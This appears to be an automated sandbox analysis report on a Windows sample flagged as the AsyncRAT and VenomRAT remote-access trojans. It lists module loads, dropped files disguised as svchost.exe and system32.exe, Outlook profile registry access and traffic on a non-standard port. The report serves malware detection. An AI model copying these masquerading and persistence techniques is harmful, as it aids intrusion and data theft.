Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: VzhY4BcvBH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: VzhY4BcvBH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: root\??\C:\Windows\System.pdb source: svchost.exe, 0000000A.00000002.4519333323.000000001C928000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: svchost.exe, 0000000A.00000002.4519333323.000000001C928000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: svchost.exe, 0000000A.00000002.4516725735.000000001C800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: svchost.exe, 0000000A.00000002.4517181240.000000001C85F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: %costura.messagepacklib.pdb.compressed source: svchost.exe, 0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: svchost.exe, 0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdbx source: svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4521155331.000000001D040000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.4502281344.0000000012612000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: svchost.exe, 0000000A.00000002.4526492924.000000001D660000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: svchost.exe, 0000000A.00000002.4478728762.000000000296F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4521155331.000000001D040000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.4502281344.0000000012612000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: svchost.exe, 0000000A.00000002.4519333323.000000001C928000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *Win32_VideoController\??\C:\Windows\dll\System.pdb source: svchost.exe, 0000000A.00000002.4519333323.000000001C928000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: svchost.exe, 0000000A.00000002.4508792580.000000001AD90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: svchost.exe, 0000000A.00000002.4516725735.000000001C800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: svchost.exe, 0000000A.00000002.4517181240.000000001C85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.4517996378.000000001C87E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: FPS_BROWSER_USER_PROFILE_STRING=Default\??\C:\Windows\symbols\dll\System.pdb source: svchost.exe, 0000000A.00000002.4516725735.000000001C800000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: svchost.exe.0.dr, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 10.2.svchost.exe.12662288.2.raw.unpack, DynamicUtils.cs	.Net Code: CreateSharpArgumentInfoArray
Source: 10.2.svchost.exe.12662288.2.raw.unpack, LateBoundReflectionDelegateFactory.cs	.Net Code: CreateDefaultConstructor
Source: 10.2.svchost.exe.1d040000.6.raw.unpack, DynamicUtils.cs	.Net Code: CreateSharpArgumentInfoArray
Source: 10.2.svchost.exe.1d040000.6.raw.unpack, LateBoundReflectionDelegateFactory.cs	.Net Code: CreateDefaultConstructor

Source: system32.exe.0.dr

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Code function: 0_2_00007FF848F300BD pushad ; iretd	0_2_00007FF848F300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848DFD2A5 pushad ; iretd	2_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848F100BD pushad ; iretd	2_2_00007FF848F100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848FE2316 push 8B485F94h; iretd	2_2_00007FF848FE231B
Source: C:\Users\user\AppData\Roaming\system32.exe	Code function: 5_2_064A1210 push 02CA072Ch; retf 8B02h	5_2_064A1357
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF848E0D2A5 pushad ; iretd	7_2_00007FF848E0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF848F200BD pushad ; iretd	7_2_00007FF848F200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF848FF2316 push 8B485F93h; iretd	7_2_00007FF848FF231B
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F3812B push ebx; ret	10_2_00007FF848F3816A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F50178 pushad ; retn 4906h	10_2_00007FF848F50181
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F31C05 push E95F4D2Bh; ret	10_2_00007FF848F31C59
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF848F200BD pushad ; iretd	10_2_00007FF848F200C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF8491135C8 pushad ; retf	10_2_00007FF849121B9D
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF849118169 push ebx; ret	10_2_00007FF84911816A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF849120697 pushad ; ret	10_2_00007FF8491206EE
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF849115D3B push esp; retf	10_2_00007FF849115D49
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 10_2_00007FF8491287B8 pushad ; retf	10_2_00007FF84912887B

Source: VzhY4BcvBH.exe

Static PE information: section name: .text entropy: 7.863903568154598

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	File created: C:\Users\user\AppData\Roaming\system32.exe			Jump to dropped file
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	File created: C:\Users\user\AppData\Roaming\svchost.exe			Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.31d6f70.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.svchost.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VzhY4BcvBH.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 5004, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 37552
Source: unknown	Network traffic detected: HTTP traffic on port 37552 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 37552
Source: unknown	Network traffic detected: HTTP traffic on port 37552 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 37552
Source: unknown	Network traffic detected: HTTP traffic on port 37552 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 37552
Source: unknown	Network traffic detected: HTTP traffic on port 37552 -> 49731

Source: C:\Users\user\AppData\Roaming\system32.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Roaming\system32.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\135A5B245453FFF30E1A BEA19E2DECE602CED1D3DF8C825A993F3D412C2A4D4D87EAA39F44BA4FB39E82

Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VzhY4BcvBH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
